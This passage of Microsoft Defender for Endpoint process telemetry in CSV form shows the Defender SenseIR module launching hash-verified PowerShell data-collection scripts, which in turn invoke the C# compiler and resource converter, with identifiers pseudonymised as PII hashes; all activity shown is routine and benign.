01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1417,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:57.531158700+00:00,7112,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '06495ee289a2bad350ac0e178f4bb4ea3c390055909858b2b055d82194a1490d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:57.553654400+00:00,2021-06-23 01:15:27.760405100+00:00,7774ef16-8f96-4374-89fd-f3f1a1ade193,computerpii_0a470890c60768167990033d701e7bd881398861,157041,False,10.7740.19041.1052,False,11540474045172152,,11540474045172229,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1418,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:57.534574500+00:00,13896,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:57.527428600+00:00,16488,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd462b7dd8c14155a7b292b44ca1247799ccf6854250dfa7c4bd544b4a9dd32ff')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:57.553849500+00:00,2021-06-23 01:15:27.760472600+00:00,81c277a0-7c3c-450f-820b-c002cbbe3bd3,computerpii_0a470890c60768167990033d701e7bd881398861,157042,False,10.7740.19041.1052,False,11540474045172228,,11540474045172231,2021-06-23 01:13:57.527428600+00:00,16488,2021-06-23 01:13:57.527428600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,16488,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1419,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:57.533369300+00:00,11964,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e9c55a592d84ab8768792af1cc8390aff01eb73f7761ca152b97a818288e1579')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:57.554496300+00:00,2021-06-23 01:15:27.760640900+00:00,2de5f42b-63ac-45b2-8786-bb09f6e44f90,computerpii_0a470890c60768167990033d701e7bd881398861,157044,False,10.7740.19041.1052,False,11540474045172152,,11540474045172230,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1420,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:57.540171800+00:00,15316,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:57.531158700+00:00,7112,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '06495ee289a2bad350ac0e178f4bb4ea3c390055909858b2b055d82194a1490d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:57.555272300+00:00,2021-06-23 01:15:27.760711100+00:00,fef57981-8612-4cc1-b149-3e6b59f9bbd3,computerpii_0a470890c60768167990033d701e7bd881398861,157045,False,10.7740.19041.1052,False,11540474045172229,,11540474045172233,2021-06-23 01:13:57.531158700+00:00,7112,2021-06-23 01:13:57.531158700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,7112,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1421,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:01.625982800+00:00,16512,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\amldwudm\amldwudm.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:57.527428600+00:00,16488,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd462b7dd8c14155a7b292b44ca1247799ccf6854250dfa7c4bd544b4a9dd32ff')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:01.684417900+00:00,2021-06-23 01:15:27.765190500+00:00,b67a7a3c-b0d5-4d68-b2a2-70f96475fa9a,computerpii_0a470890c60768167990033d701e7bd881398861,157104,False,10.7740.19041.1052,False,11540474045172228,,11540474045172235,2021-06-23 01:13:57.527428600+00:00,16488,2021-06-23 01:13:57.527428600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,16488,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1422,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:01.673158+00:00,18436,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\53m0bi5o.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:57.531158700+00:00,7112,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '06495ee289a2bad350ac0e178f4bb4ea3c390055909858b2b055d82194a1490d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:01.970657300+00:00,2021-06-23 01:15:27.765714400+00:00,a55052a5-45c1-4891-8607-4e66626e6d7f,computerpii_0a470890c60768167990033d701e7bd881398861,157111,False,10.7740.19041.1052,False,11540474045172229,,11540474045172236,2021-06-23 01:13:57.531158700+00:00,7112,2021-06-23 01:13:57.531158700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,7112,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1423,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:02.009802900+00:00,14816,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_694508ad91b1b5f81c0e1947600bec8cd46844e3.tmp"" ""c:\Windows\Temp\amldwudm\FilePII_e76f5ffa90f556a4730cd4f989e4835d6639c9c7.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:14:01.625982800+00:00,16512,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\amldwudm\amldwudm.cmdline""",True,2021-06-23 01:13:57.527428600+00:00,16488,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:02.039025800+00:00,2021-06-23 01:15:27.765915600+00:00,ac7344b0-c3a6-4b57-8f33-83badaf0f6f6,computerpii_0a470890c60768167990033d701e7bd881398861,157114,False,10.7740.19041.1052,False,11540474045172235,,11540474045172237,2021-06-23 01:14:01.625982800+00:00,16512,2021-06-23 01:14:01.625982800+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,16512,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1424,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:02.033248600+00:00,8304,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_7b3c6078af59bd4996aa3b5ecec544ef0694507a.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_84bd6d1c342b0b30f36715bf4009655eedb5028b.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:14:01.673158+00:00,18436,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\53m0bi5o.cmdline""",True,2021-06-23 01:13:57.531158700+00:00,7112,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:02.147219200+00:00,2021-06-23 01:15:27.766312200+00:00,0a77cea8-4d69-4342-a4ab-c16fa90f11a7,computerpii_0a470890c60768167990033d701e7bd881398861,157120,False,10.7740.19041.1052,False,11540474045172236,,11540474045172238,2021-06-23 01:14:01.673158+00:00,18436,2021-06-23 01:14:01.673158+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,18436,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1425,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:14:03.394678400+00:00,12820,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\xffwvxv1\xffwvxv1.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:57.533369300+00:00,11964,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e9c55a592d84ab8768792af1cc8390aff01eb73f7761ca152b97a818288e1579')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:14:03.411474700+00:00,2021-06-23 01:15:27.770599800+00:00,a231f054-a589-4259-a2ac-8c70026872e7,computerpii_0a470890c60768167990033d701e7bd881398861,157173,False,10.7740.19041.1052,False,11540474045172230,,11540474045172239,2021-06-23 01:13:57.533369300+00:00,11964,2021-06-23 01:13:57.533369300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,11964,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 